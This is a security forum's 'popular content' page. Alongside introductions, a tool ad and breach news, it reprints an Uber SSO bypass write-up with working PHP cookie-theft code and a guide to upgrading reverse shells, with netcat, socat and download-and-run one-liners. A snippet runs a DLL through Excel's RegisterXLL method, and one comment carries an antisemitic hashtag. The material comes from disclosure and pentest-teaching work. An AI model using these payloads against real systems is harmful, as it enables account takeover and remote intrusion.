
Leaderboard

Popular Content

Showing content with the highest reputation on 07/12/17 in all areas

  1. Hi, I'm glad I found this forum. For a long time I've been wondering where I could find a community of people passionate about security with whom I could exchange ideas. Thanks Alex for the recommendation! I'm 29, I work in IT as an administrator for various systems, and on top of that I'm doing a Master's in IT Security at the Technikum University of Applied Sciences in Vienna (I've finished the first year). I grew up among "hackers", and in high school I was a script kiddie; I liked playing pranks on neighbours/classmates, etc., but I don't want to go into details, in case one of them is reading. After high school my dream was to become a Database Administrator and I learned that field properly, but then I got bored of it. About 3 years ago at work, after a security project in which we had to change all the systems to comply with certain security standards, I realised how cool the security field is and started learning, especially on Cybrary; then I signed up for the master's because I realised I needed someone to guide me on what exactly to learn. Thanks to the university courses and the courses on Cybrary and HackingDojo (not recommended), I've learned a bit of hacking: Web (XSS, CSRF, SQL injection, RCE, LFI, path traversal); OS/App: buffer overflows, DLL hijacking, DLL forwarding, information gathering, privilege escalation, Kerberos hacking, writing Metasploit modules. But actually I'm not that interested in learning hacking, I just want to know what's possible... what the hacking techniques are. There are other areas of security that interest me more: cryptography, protocol security (TLS, DNSSEC, IPsec, authentication and authorisation protocols), security detection and defense, etc. Programming: C# - fairly well; Python - mediocre; Ruby, Java - I get by.
    4 points
  2. Hi Radu, Of course, we'll gladly help you if you answer the following questions: - what is a flood? - what is a DDoS domain? - what is the difference between the two terms above? - what exactly do you want to do? - why do you want to do that? - are you a Metin player? - do you think you're solving anything by doing that? Here, from those who understand absolute divinity and the competitive astral plane: [ASCII art, not recoverable from the flattened text] Regards, me
    4 points
  3. Static code analyzer for C, C++ and C#
     PVS-Studio is a tool for bug detection in the source code of programs written in C, C++ and C#. It works in Windows and Linux environments. PVS-Studio performs static code analysis and generates a report that helps a programmer find and fix bugs. PVS-Studio performs a wide range of code checks; it is also useful for finding misprints and copy-paste errors. Examples of such errors: V501, V517, V522, V523, V3001.
     The main value of static analysis is in its regular use, so that errors are identified and fixed at the earliest stages. There is no point in wasting 50 hours looking for a bug that could be found with static analysis. So, let's point that out again: the main idea of static analysis is not to find one hidden bug on the day before the release, but to fix dozens of bugs day by day. The analyzer can be run at night on the server and warn about suspicious code fragments. Ideally, these errors can be detected and fixed before getting into the repository. PVS-Studio can automatically be launched immediately after the compiler for the files that have just been modified. It works in Windows and Linux.
     Download PVS-Studio for Windows x64: PVS-Studio_setup.exe (56 Mb)
     Download PVS-Studio for Linux (x64 only): .deb (4 Mb), .tgz (7 Mb), .rpm (4 Mb)
     Source: https://www.viva64.com/en/pvs-studio/
    3 points
  4. Conversation on another level on our semi-community of IT people. The holy gospel must be preached here too http://sprunge.us/JNjG
    3 points
  5. Forex? Money. Mathematics. Information. Let me give you an example: Bitcoin. I found out about Bitcoin when Liberty Reserve was on its way out; one Bitcoin cost 90 cents. I wanted to buy some too, but what the heck would I do with them? I had read that an American bought pizza with Bitcoin, 13 Bitcoin worth, family size... Then I wanted to buy 1 Bitcoin so I wouldn't die stupid. But just as foolishly I moved on to another idea...... True story, the end
    3 points
  6. Hi, there's no point saying you moved from C++ to Perl because nobody will believe you; you can't move away from C++ as long as you haven't done anything in C++. All well and good, but why the hell would you learn Perl to flood? Does anyone still have dial-up internet, or what's the deal? Still, if you really want to learn to do this, I'll leave you some links https://seanhamptoncole.wordpress.com/2012/11/15/how-to-stop-being-stupid-in-10-easy-steps/ http://bfy.tw/CnSG
    2 points
  7. Authentication bypass on Uber’s Single Sign-On via subdomain takeover
     Posted on June 25, 2017 by Arne Swinnen

     TL;DR: Uber was vulnerable to subdomain takeover on saostatic.uber.com via Amazon CloudFront CDN. Moreover, Uber’s recently deployed Single Sign-On (SSO) system at auth.uber.com, which is based on shared cookies between all *.uber.com subdomains, was found vulnerable to session cookie theft by any compromised *.uber.com subdomain. Therefore, the impact of the subdomain takeover could be increased to Authentication Bypass of Uber’s full SSO system, yielding access to all *.uber.com subdomains protected by it (e.g. vault.uber.com, partners.uber.com, riders.uber.com, etc). Uber resolved the subdomain takeover vulnerability and granted a $5.000 bounty for the two combined issues.

     Single Sign-On security revisited
     Generally, SSO systems are (variations of) any of the following three types, in order of popularity:
     - OAuth: Security is mainly based on whitelisted callback URLs of service providers configured at the identity providers, and CSRF protection via the “state” parameter. Flaws are often via open redirect chains, e.g. Authentication bypass on Airbnb via OAuth tokens theft.
     - SAML & friends: Security is based on XML messages signed with pre-exchanged cryptographic keys between service and identity providers. Flaws are often XML Signature bypasses, e.g. OneLogin authentication bypass on WordPress sites that bit Uber before.
     - Shared (session) cookies between subdomains: Security is based on the integrity of all subdomains. Any vulnerability on any subdomain that provides an attacker insight into the shared session cookies issued by the SSO system is fatal. Flaws are thus often RCE, debug logs exposure, subdomain takeover and friends on subdomains, e.g. Authentication bypass on Ubiquity’s Single Sign-On via subdomain takeover.
     I personally believe that the first two in this list have had many problems in the past, but have improved lately in terms of security. The latter SSO based on shared session cookies between subdomains is more a technology from the past, before the former two even existed. By design, it enforces that anything that wants to leverage the SSO system must be a subdomain of the same TLD as where the SSO system is based. Since the security of the SSO system is based on the integrity of the subdomains (see the aforementioned report and the Uber case below), this is quite an ironic situation. By design, it encourages increasing the attack surface enormously.

     Uber case
     Uber used OAuth as an SSO system for *.uber.com subdomains in the past, as can be seen from this recent public disclosure report by @ngalog: [Uber 8k Bug] Login CSRF + Open Redirect = Account Takeover. However, recently they’ve changed (reverted?) to an SSO system based on shared session cookies among subdomains of *.uber.com. If you now browse to any uber.com subdomain that requires authentication (e.g. central, partners, riders, vault, developer, …), you get redirected to auth.uber.com instead. Once you’ve logged in there and you visit another subdomain, you’re logged in there transparently via the SSO system at auth.uber.com, which issues temporary session cookies for every *.uber.com subdomain after being logged in once.
     A vulnerability was identified in this SSO system that allows any compromised subdomain on *.uber.com to transparently issue and steal valid session cookies issued for *any* uber.com subdomain by auth.uber.com, as long as the victim had already authenticated once to the SSO. Uber did have some countermeasures in place to prevent this, but these were bypassed and reported together with the subdomain takeover for increased impact. Any compromised *.uber.com subdomain could be used to perform the same attack, although Uber explicitly mentioned several *.uber.com subdomains as out of scope in their bug bounty program policy at the time of reporting (e.g. *.dev.uber.com, *.et.uber.com, drive.uber.com, etc).

     Subdomain takeover
     Subdomain saostatic.uber.com was pointing to Amazon CloudFront CDN via a DNS CNAME, but the hostname was not registered there anymore (dangling pointer). This allowed me to fully take over this domain, highly similar to Subdomain takeover on rider.uber.com due to non-existent distribution on CloudFront by Frans Rosén. I effectively took over the subdomain as a Proof of Concept and hosted a simple HTML file as proof here:

     Authentication bypass
     In Uber’s SSO system, auth.uber.com acts as Identity Provider and issues temporary shared session cookies for https://*.uber.com (“domain=uber.com” cookie attribute) to communicate identities to Service Providers (e.g. riders.uber.com, partners.uber.com, central.uber.com, vault.uber.com, developer.uber.com, and many more). Service Providers on their end immediately destroy the incoming temporary shared session cookies in case of erroneous (e.g. issued for another Service Provider) or successful authentication to ensure that the window for theft is small, as can be seen in the below Uber SSO Login diagram:
     The precious shared session cookie “_csid” can thus only be stolen between steps 9-12, which is a very short period (automatic browser redirects). Although not impossible to exploit (see Jack Whitton’s awesome CSP trick to block certain cookies from being sent to certain domains, coincidentally also on Uber’s bug bounty program), a more convenient flaw was identified that allows the shared session cookie to remain alive after step 12 in the browser’s cookie store in the diagram above. The issue is that, if the victim is already logged in at https://riders.uber.com (situation after last step 12 in the diagram) when receiving a request containing a valid newly generated shared session cookie “_csid” from auth.uber.com, it is simply ignored and remains usable. Hence it stays alive in the browser until its cookie store is cleared. An attacker simply needs to replay step 3 in the above diagram as step 13 and end with an additional hidden request to https://saostatic.uber.com to steal the precious session cookie:
     So once an attacker gets his/her hands on the victim’s “_csid” shared session cookie for https://riders.uber.com, he/she can execute the normal login flow in their own browser and replace the issued “_csid” cookie value in step 9 to be logged in as the victim, right? Wrong. Uber had another surprising countermeasure in place, namely a variant of login cross-site request forgery protection. This is the actual updated Uber SSO Login diagram:
     The problem here is the GET param state=CSRFTOKEN and the locally scoped state cookie that are added in step 3 by the Service Provider riders.uber.com and verified in step 11. Since we can’t steal these values from the victim’s browser, but only the “_csid” shared session cookie, this means game over, right? Unfortunately, wrong. An attacker can obtain a proper CSRFTOKEN value and accompanying state cookie value from https://riders.uber.com by starting a normal login scenario on their end (e.g. in their own browser or via a simple script). He/she can then relay the auth.uber.com URL generated by https://riders.uber.com in their own browser in step 3 to the victim’s browser to generate & steal the “_csid” shared session cookie for these values, and inject these in his/her own browser login scenario again in step 9. In this manner, the victim effectively generates the “_csid” temporary session token for the attacker’s login scenario in a separate browser, but this works flawlessly (e.g. no IP-based checks between steps were encountered). This still allows exploitation and thus victim impersonation in the following manner (we still assume that the victim is already logged in to auth.uber.com and visits a webpage under control of the attacker, so we basically continue the flow from the above diagram):

     Proof of concept
     A PoC says more than a thousand diagrams. In the PoC steps sent to Uber & showcased in the video below, the assumption is made that https://saostatic.uber.com is actually serving a valid SSL certificate in the victim’s browser, which was not the case. However, it could’ve easily been generated with Let’s Encrypt.
     1. Open the victim’s browser & browse to https://riders.uber.com. After being redirected to https://auth.uber.com, login with the victim’s credentials so you end up on the https://riders.uber.com trips dashboard again.
     2. Open a second browser tab in the victim’s browser and browse to https://saostatic.uber.com/prepareuberattack.php. Accept any certificate warnings that you may receive here – again, we’re only simulating that the domain has a valid SSL certificate. Once the page has finished loading you should see a URL, a “Cookie: ” string and “Set-Cookie: ” strings underneath each other. This is all info gathered under the hood by the attacker’s webserver that is required to login as the victim now – everything has been stolen automagically.
     3. Open the separate attacker’s browser and set up an intercepting proxy tool to intercept requests and responses.
     4. Browse to the URL displayed on the prepareuberattack.php page output and intercept this request. Now copy the “Cookie: …” string displayed on prepareuberattack.php and paste it into the request headers. The response should be a redirect to https://riders.uber.com/trips, indicating successful authentication bypass.
     5. Last but not least, copy all the “Set-Cookie: ” lines from the prepareuberattack.php page output and paste them in the response before forwarding it to the browser. This ensures that the stolen cookies are permanently injected in the attacker’s browser.
     6. You are now logged in as the victim in the attacker’s browser.
     In a real attack scenario, an attacker would stealthily load https://saostatic.uber.com/prepareuberattack.php in the victim’s browser, e.g. through an iframe. Likewise, he/she would probably not display the URL and all the cookies on the resulting page, but store this on the server-side, ready to be abused in a stealthy fashion. Although it’s a lengthy explanation, the PoC video showcases how quick & effective exploitation by an attacker can be.
     The code of the https://saostatic.uber.com/prepareuberattack.php and https://saostatic.uber.com/uberattack.php pages is provided below. This was written quick & dirty for PoC purposes, but it did the job:

     prepareuberattack.php (PHP)
         <html>
         <body>
         <script>
         <?php
         // Called by curl for every response header line of the riders.uber.com request (step 3):
         // extracts the SP's "state" cookie value and the redirect Location to auth.uber.com.
         function HandleHeaderLine( $curl, $header_line ) {
             preg_match("/state=([^;]*);/", $header_line, $matches);
             if(sizeof($matches) > 0) {
                 print("var cookiestate = '" . $matches[1] . "';\n");
             }
             preg_match("/Location: (.*)/", $header_line, $matches);
             if(sizeof($matches) > 0) {
                 print("var loc = '" . trim($matches[1]) . "';\n");
             }
             return strlen($header_line);
         }
         $c = curl_init('https://riders.uber.com');
         curl_setopt($c, CURLOPT_VERBOSE, 1);
         curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
         curl_setopt($c, CURLOPT_HEADERFUNCTION, "HandleHeaderLine");
         $page = curl_exec($c);
         ?>
         var csrf = loc.substring(loc.lastIndexOf("=")+1);
         var img = document.createElement("IMG");
         img.onerror = function () {
             var iframe = document.createElement("iframe");
             iframe.setAttribute("src","https://saostatic.uber.com/uberattack.php?cookiestate=" + encodeURIComponent(cookiestate) + "&csrftoken=" + csrf);
             iframe.setAttribute("width", "100%");
             iframe.setAttribute("height", "10000");
             document.body.appendChild(iframe);
         }
         img.src=loc;
         </script>
         </body>
         </html>

     uberattack.php (PHP)
         <html>
         <body>
         <?php
         $cookiestring = "state=" . $_GET["cookiestate"] . "; ";
         $cookiestringset = "";
         $interestincookies = array("_udid", "_csid", "sid");
         foreach ($_COOKIE as $name => $value) {
             if (in_array($name,$interestincookies)) {
                 $cookiestring = $cookiestring . $name . "=" . str_replace(' ', '+', $value) . "; ";
                 $cookiestringset = $cookiestringset . "Set-Cookie: " . $name . "=" . str_replace(' ', '+', $value) . ";</br>";
             }
         }
         print "Url: " . 'https://riders.uber.com/?state=' . urlencode($_GET["csrftoken"]) . "<br /><br />";
         print "Cookie: " . $cookiestring . "<br />";
         print "<br />" . $cookiestringset . "<br />";
         ?>
         </body>
         </html>

     The first file can be hosted anywhere, the second file must be hosted on the hijacked subdomain (since it reads & reflects the incoming session cookies). By simply changing “riders.uber.com” to any other subdomain of uber.com in these two PHP files, an attacker could generate valid sessions for these subdomains on behalf of the victim, e.g. vault.uber.com, partners.uber.com, developer.uber.com, …

     Recommendations
     The recommendations provided to Uber were twofold:
     1. Resolve the subdomain takeover of saostatic.uber.com by removing the dangling CNAME to AWS CloudFront CDN.
     2. Resolve the Authentication Bypass issue by any of the following, in order of priority:
        - Revert the SSO system back to OAuth 2, since this does not have the side-effect of actually encouraging a large attack surface like the current shared session SSO system.
        - Or, implement an IP address check: Store a user’s external IP address when issuing a shared “_csid” session cookie on auth.uber.com (identity provider) and verify that users presenting this shared session cookie to service providers on *.uber.com have the same external IP address, to prevent relay attacks like the one described above. There is a residual risk here, namely when the attacker has the same external IP address as their victim (e.g. on the same corporate network/wireless access point/…).
        - Or, accept the inherent risk and include all *.uber.com subdomains in your bug bounty program scope, since they have the potential to fully compromise the SSO system, including the high-value targets vault.uber.com, partners.uber.com and riders.uber.com.
     Ultimately, Uber removed the dangling CNAME and decided to implement the IP address check to decrease the exposed risk through their current cookie based SSO system. They thus opted to accept the residual risk involved.

     Timeline
     - 07/04/2017: Submitted bug report to Uber
     - 11/04/2017: Triaged by Uber
     - 14/04/2017: $500 minimum bounty awarded
     - 06/06/2017: Pinged Uber about the report, since I still owned saostatic.uber.com at this point
     - 06/06/2017: Response from Uber that this report fell through the cracks, starting mitigations now
     - 07/06/2017: DNS CNAME record for saostatic.uber.com removed, report marked as closed
     - 14/06/2017: Extra $4.500 bounty awarded
     - 07/07/2017: IP address check deployed by Uber and confirmed after retest
     - 11/07/2017: Permission granted to publish blogpost by Uber
     Arne Swinnen. Belgian. IT Security. Bug Bounty Hunter.
     Source: https://www.arneswinnen.net/2017/06/authentication-bypass-on-ubers-sso-via-subdomain-takeover/
    2 points
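As an added illustration of the two weaknesses in the write-up above (a model written for this page, not Uber's code or Arne Swinnen's PoC), the following Python simulates a shared-cookie SSO: an identity provider minting the shared `_csid` cookie and a service provider exchanging it for a local session. It shows why the service provider must destroy every incoming `_csid` even when the browser is already logged in, and why only binding `_csid` to the client address stops the state-token relay. Host names, cookie names and step numbers follow the article; the HMAC signing, the `state@host` cookie naming and the IP addresses are constructed for the model.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional

IDP_KEY = b"constructed-idp-signing-key"  # constructed for the model only


def sign(payload: str) -> str:
    return hmac.new(IDP_KEY, payload.encode(), hashlib.sha256).hexdigest()


@dataclass
class Browser:
    """One cookie jar per browser; '_csid' is shared by all hosts (domain=uber.com)."""
    ip: str
    cookies: Dict[str, str] = field(default_factory=dict)


class IdentityProvider:
    """Stands in for auth.uber.com, which mints the shared '_csid' cookie."""

    def __init__(self, bind_ip: bool):
        self.bind_ip = bind_ip  # the IP address check Uber deployed as mitigation

    def login_redirect(self, browser: Browser, user: str, sp: str, state: str) -> None:
        # Step 9 in the write-up: set '_csid' and redirect the browser back to the SP.
        ip = browser.ip if self.bind_ip else "*"
        payload = f"{user}|{sp}|{state}|{ip}"
        browser.cookies["_csid"] = f"{payload}|{sign(payload)}"


class ServiceProvider:
    """Stands in for riders.uber.com, which exchanges '_csid' for a local session."""

    def __init__(self, host: str, hardened: bool):
        self.host = host
        self.hardened = hardened  # always consume '_csid', even when already logged in
        self.sessions: Dict[int, str] = {}  # id(browser) -> user

    def start_login(self, browser: Browser) -> str:
        # Step 3: mint the CSRF 'state' token and keep a copy in a host-scoped cookie.
        state = secrets.token_hex(8)
        browser.cookies[f"state@{self.host}"] = state
        return state

    def callback(self, browser: Browser, state_param: str) -> Optional[str]:
        # Steps 11-12: check the incoming '_csid' against state param and state cookie.
        csid = browser.cookies.get("_csid")
        if csid is None:
            return self.sessions.get(id(browser))
        if not self.hardened and id(browser) in self.sessions:
            # The flaw: an already logged-in SP ignores the new '_csid' and leaves it alive.
            return self.sessions[id(browser)]
        browser.cookies.pop("_csid")  # single-use: destroy it whether or not it is accepted
        user = self.verify(csid, browser, state_param)
        if user is not None:
            self.sessions[id(browser)] = user
        return self.sessions.get(id(browser))

    def verify(self, csid: str, browser: Browser, state_param: str) -> Optional[str]:
        parts = csid.split("|")
        if len(parts) != 5 or not hmac.compare_digest(sign("|".join(parts[:4])), parts[4]):
            return None
        user, sp, state, ip = parts[:4]
        if sp != self.host or state != state_param:
            return None
        if browser.cookies.get(f"state@{self.host}") != state:
            return None
        if ip != "*" and ip != browser.ip:
            return None  # cookie was minted for another client address (relayed)
        return user


def run_normal_login(idp: IdentityProvider, sp: ServiceProvider, browser: Browser, user: str) -> Optional[str]:
    state = sp.start_login(browser)
    idp.login_redirect(browser, user, sp.host, state)
    return sp.callback(browser, state)


def stale_csid_after_second_login(hardened: bool) -> bool:
    """True if an unsolicited second '_csid' stays in the victim's jar (the original flaw)."""
    idp, sp = IdentityProvider(bind_ip=False), ServiceProvider("riders.uber.com", hardened)
    victim = Browser(ip="198.51.100.10")
    run_normal_login(idp, sp, victim, "victim")  # after step 12: logged in, cookie consumed
    attacker_state = "state-chosen-by-attacker"  # step 13: a replay of step 3
    idp.login_redirect(victim, "victim", sp.host, attacker_state)
    sp.callback(victim, attacker_state)
    return "_csid" in victim.cookies


def relay_attack_succeeds(bind_ip: bool) -> bool:
    """True if a victim-minted '_csid' logs the attacker's browser in as the victim."""
    idp, sp = IdentityProvider(bind_ip), ServiceProvider("riders.uber.com", hardened=True)
    victim, attacker = Browser(ip="198.51.100.10"), Browser(ip="203.0.113.7")
    run_normal_login(idp, sp, victim, "victim")
    state = sp.start_login(attacker)                      # attacker's own state + state cookie
    idp.login_redirect(victim, "victim", sp.host, state)  # victim's browser mints '_csid' for it
    attacker.cookies["_csid"] = victim.cookies.pop("_csid")  # read back via the hijacked subdomain
    return sp.callback(attacker, state) == "victim"
```

Consuming `_csid` on every callback closes the stale-cookie window, but `relay_attack_succeeds(bind_ip=False)` still returns True: only the address binding rejects the relayed cookie, with the residual same-IP risk the article notes.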
  8. Upgrading simple shells to fully interactive TTYs
     10 JULY 2017

     Table of Contents
     - Generating reverse shell commands
     - Method 1: Python pty module
     - Method 2: Using socat
     - Method 3: Upgrading from netcat with magic
     - tl;dr cheatsheet

     Every pentester knows that amazing feeling when they catch a reverse shell with netcat and see that oh-so-satisfying verbose netcat message followed by output from id. And if other pentesters are like me, they also know that dreadful feeling when their shell is lost because they run a bad command that hangs and accidentally hit "Ctrl-C" thinking it will stop it, but it instead kills the entire connection. Besides not correctly handling SIGINT, these "dumb" shells have other shortcomings as well:
     - Some commands, like su and ssh, require a proper terminal to run
     - STDERR usually isn't displayed
     - Can't properly use text editors like vim
     - No tab-complete
     - No up arrow history
     - No job control
     - Etc...
     Long story short, while these shells are great to catch, I'd much rather operate in a fully interactive TTY. I've come across some good resources that include very helpful tips and techniques for "upgrading" these shells, and wanted to compile and share them in a post. Along with Pentest Monkey, I also learned the techniques from Phineas Fisher in his released videos and writeups of his illegal activities:
     - Pentest Monkey - Post Exploitation Without a TTY
     - Phineas Fisher Hacks Catalan Police Union Website
     - Phineas Fisher - Hackingteam Writeup
     For reference, in all the screenshots and commands to follow, I am injecting commands into a vulnerable web server ("VICTIM") and catching shells from my Kali VM ("KALI"):
     - VICTIM IP: 10.0.3.7
     - KALI IP: 10.0.3.4

     Generating reverse shell commands
     Everyone is pretty familiar with the traditional way of using netcat to get a reverse shell:
         nc -e /bin/sh 10.0.3.4 4444
     and catching it with:
         nc -lvp 4444
     The problem is not every server has netcat installed, and not every version of netcat has the -e option. Pentest Monkey has a great cheatsheet outlining a few different methods, but my favorite technique is to use Metasploit's msfvenom to generate the one-liner commands for me. Metasploit has several payloads under "cmd/unix" that can be used to generate one-liner bind or reverse shells:
     Any of these payloads can be used with msfvenom to spit out the raw command needed (specifying LHOST, LPORT or RPORT). For example, here's a netcat command not requiring the -e flag:
     And here's a Perl one-liner in case netcat isn't installed:
     These can all be caught by using netcat and listening on the port specified (4444).

     Method 1: Python pty module
     One of my go-to commands for a long time after catching a dumb shell was to use Python to spawn a pty. The pty module lets you spawn a pseudo-terminal that can fool commands like su into thinking they are being executed in a proper terminal. To upgrade a dumb shell, simply run the following command:
         python -c 'import pty; pty.spawn("/bin/bash")'
     This will let you run su for example (in addition to giving you a nicer prompt). Unfortunately, this doesn't get around some of the other issues outlined above. SIGINT (Ctrl-C) will still close Netcat, and there's no tab-completion or history. But it's a quick and dirty workaround that has helped me numerous times.

     Method 2: Using socat
     socat is like netcat on steroids and is a very powerful networking swiss-army knife. Socat can be used to pass full TTYs over TCP connections. If socat is installed on the victim server, you can launch a reverse shell with it. You must catch the connection with socat as well to get the full functions. The following commands will yield a fully interactive TTY reverse shell:
     On Kali (listen):
         socat file:`tty`,raw,echo=0 tcp-listen:4444
     On Victim (launch):
         socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
     If socat isn't installed, you're not out of luck. There are standalone binaries that can be downloaded from this awesome Github repo: https://github.com/andrew-d/static-binaries
     With a command injection vuln, it's possible to download the correct architecture socat binary to a writable directory, chmod it, then execute a reverse shell in one line:
         wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
     On Kali, you'll catch a fully interactive TTY session. It supports tab-completion, SIGINT/SIGTSTP support, vim, up arrow history, etc. It's a full terminal. Pretty sweet.

     Method 3: Upgrading from netcat with magic
     I watched Phineas Fisher use this technique in his hacking video, and it feels like magic. Basically it is possible to use a dumb netcat shell to upgrade to a full TTY by setting some stty options within your Kali terminal.
     First, follow the same technique as in Method 1 and use Python to spawn a PTY. Once bash is running in the PTY, background the shell with Ctrl-Z.
     While the shell is in the background, now examine the current terminal and STTY info so we can force the connected shell to match it:
     The information needed is the TERM type ("xterm-256color") and the size of the current TTY ("rows 38; columns 116").
     With the shell still backgrounded, now set the current STTY to type raw and tell it to echo the input characters with the following command:
         stty raw -echo
     With a raw stty, input/output will look weird and you won't see the next commands, but as you type they are being processed.
     Next foreground the shell with fg. It will re-open the reverse shell but formatting will be off. Finally, reinitialize the terminal with reset.
     Note: I did not type the nc command again (as it might look above). I actually entered fg, but it was not echoed. The nc command is the job that is now in the foreground. The reset command was then entered into the netcat shell.
     After the reset the shell should look normal again. The last step is to set the shell, terminal type and stty size to match our current Kali window (from the info gathered above):
         $ export SHELL=bash
         $ export TERM=xterm-256color
         $ stty rows 38 columns 116
     The end result is a fully interactive TTY with all the features we'd expect (tab-complete, history, job control, etc) all over a netcat connection:
     The possibilities are endless now. Tmux over a netcat shell?? Why not?

     tl;dr cheatsheet
     Cheatsheet commands:
     Using Python for a pseudo terminal
         python -c 'import pty; pty.spawn("/bin/bash")'
     Using socat
         # Listener:
         socat file:`tty`,raw,echo=0 tcp-listen:4444
         # Victim:
         socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
     Using stty options
         # In reverse shell
         $ python -c 'import pty; pty.spawn("/bin/bash")'
         Ctrl-Z
         # In Kali
         $ stty raw -echo
         $ fg
         # In reverse shell
         $ reset
         $ export SHELL=bash
         $ export TERM=xterm-256color
         $ stty rows <num> columns <cols>
     Any other cool techniques? Let me know in the comments or hit me up on twitter. Enjoy!
     -ropnop
     Source: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
    2 points
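Seen from the defender's side, each of the three upgrade methods above leaves a recognisable trail in process-execution telemetry: the `pty.spawn` one-liner, a `socat` with `exec:` and `pty` options pointed at a TCP address, the static-binary download, and the `stty rows … columns …` resize, all typically spawned under a web server worker. The following Python is an added example for this page (not ropnop's tooling) that runs rules for those indicators over constructed log lines; the log layout, timestamps, user and host names are made up for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed log lines for this example (not a real auditd/EDR format):
# <timestamp> <user> <parent process name> <command line>
SAMPLE_LOG = """\
2017-07-10T12:00:00Z www-data apache2 nc -e /bin/sh 10.0.3.4 4444
2017-07-10T12:00:01Z www-data apache2 sh -c id
2017-07-10T12:00:05Z www-data apache2 python -c 'import pty; pty.spawn("/bin/bash")'
2017-07-10T12:00:09Z www-data bash stty rows 38 columns 116
2017-07-10T12:01:10Z www-data apache2 wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat
2017-07-10T12:01:11Z www-data apache2 /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
2017-07-10T12:02:00Z backup cron python -c 'import json, sys; json.load(sys.stdin)'
2017-07-10T12:02:30Z alice sshd socat TCP-LISTEN:8080,fork TCP:localhost:80
2017-07-10T12:03:00Z alice bash stty sane
"""

WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "php-cgi"}

# (rule name, pattern over the command line); each mirrors one step of the write-up.
RULES: List[Tuple[str, re.Pattern]] = [
    ("python_pty_spawn", re.compile(r"\bimport\s+pty\b.*\bpty\.spawn\(")),
    ("socat_pty_shell", re.compile(r"\bsocat\b.*\bexec:.*\bpty\b.*\btcp\d?:", re.I)),
    ("netcat_exec_shell", re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s+/bin/(?:ba)?sh\b")),
    ("static_socat_download", re.compile(r"\b(?:wget|curl)\b.*static-binaries.*\bsocat\b")),
    ("tty_resize", re.compile(r"\bstty\s+rows\s+\d+\s+columns\s+\d+\b")),
]
# A shell or interpreter as the *first* word of the command line, with or without a path.
INTERPRETER = re.compile(r"(?:/\S*/)?(?:sh|bash|dash|python\d?|perl|php|socat)\b")


def parse_line(line: str) -> Dict[str, str]:
    ts, user, parent, cmd = line.split(" ", 3)
    return {"ts": ts, "user": user, "parent": parent, "cmd": cmd}


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules that fire on one execution event."""
    hits = [name for name, rx in RULES if rx.search(event["cmd"])]
    # A shell or interpreter started directly by a web server worker is the
    # command-injection precondition the write-up starts from.
    if event["parent"] in WEB_PARENTS and INTERPRETER.match(event["cmd"]):
        hits.append("web_server_spawned_interpreter")
    return hits


def detect(log: str) -> List[Tuple[str, List[str]]]:
    """Return (timestamp, [rule names]) for every line that fires at least one rule."""
    findings = []
    for line in log.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        hits = classify(event)
        if hits:
            findings.append((event["ts"], hits))
    return findings


def upgrade_sequence_seen(findings: List[Tuple[str, List[str]]]) -> bool:
    """True when a PTY was spawned and the TTY was resized afterwards (Method 3 end to end)."""
    names = [n for _, hits in findings for n in hits]
    if "python_pty_spawn" not in names:
        return False
    return "tty_resize" in names[names.index("python_pty_spawn"):]
```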
  9. Verizon, the major telecommunications provider, has suffered a data security breach with over 14 million US customers' personal details exposed on the Internet after NICE Systems, a third-party vendor, mistakenly left the sensitive users’ details open on a server.
     Chris Vickery, researcher and director of cyber risk research at security firm UpGuard, discovered the exposed data on an unprotected Amazon S3 cloud server that was fully downloadable and configured to allow public access. The exposed data includes sensitive information of millions of customers, including their names, phone numbers, and account PINs (personal identification numbers), which is enough for anyone to access an individual's account, even if the account is protected by two-factor authentication.
     NICE Systems is an Israel-based company that is known for offering a wide range of solutions for intelligence agencies, including telephone voice recording, data security, and surveillance. According to the researcher, it is unknown why Verizon has allowed a third-party company to collect call details of its users; however, it appears that NICE Systems monitors the efficiency of its call-center operators for Verizon. The exposed data contained records of customers who called Verizon's customer service in the past 6 months, which are recorded, obtained and analyzed by NICE.
     Interestingly, the leaked data on the server also indicates that NICE Systems has a partnership with the Paris-based popular telecommunication company "Orange," for which it also collects customer details across Europe and Africa.
     Vickery had privately informed the Verizon team about the exposure in late June, and the data was then secured within a week.
     Vickery is a reputed researcher, who has previously tracked down many exposed datasets on the Internet. Just last month, he discovered an unsecured Amazon S3 server owned by data analytics firm Deep Root Analytics (DRA), which exposed information of more than 198 Million United States citizens, that's over 60% of the US population. In March this year, Vickery discovered a cache of 60,000 documents from a US military project for the National Geospatial-Intelligence Agency (NGA) which was also left unsecured on an Amazon cloud storage server for anyone to access. In the same month, the researcher also discovered an unsecured and publicly exposed database, containing nearly 1.4 Billion user records, linked to River City Media (RCM). In 2015, Vickery also reported a huge cache of more than 191 Million US voter records and details of as many as 13 Million MacKeeper users.
     Via thehackernews.com
    1 point
  10. Banned - 3 months and 30 days. Maybe you'll learn something in the meantime.
    1 point
  11. And... what are we supposed to do about them, marry them? Screw those abject Americans. The ISPs over there sell their clients' info for profit anyway, and umpteen secret services track their every move, because, yeah right, terrorists. #JewPower
    1 point
  12. Execute DLL via the Excel.Application object's RegisterXLL() method
      BAT
          REM rundll32 mshtml.dll HTA one-liner command:
          rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
      JS
          // Create instance of Excel.Application COM object
          var excel = new ActiveXObject("Excel.Application");
          // Pass in path to the DLL (can use any extension)
          excel.RegisterXLL("C:\\Users\\Bob\\AppData\\Local\\Temp\\evilDLL.xyz");
      PowerShell
          # Create instance of Excel.Application COM object
          $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))
          # Pass in path to the DLL (can use any extension)
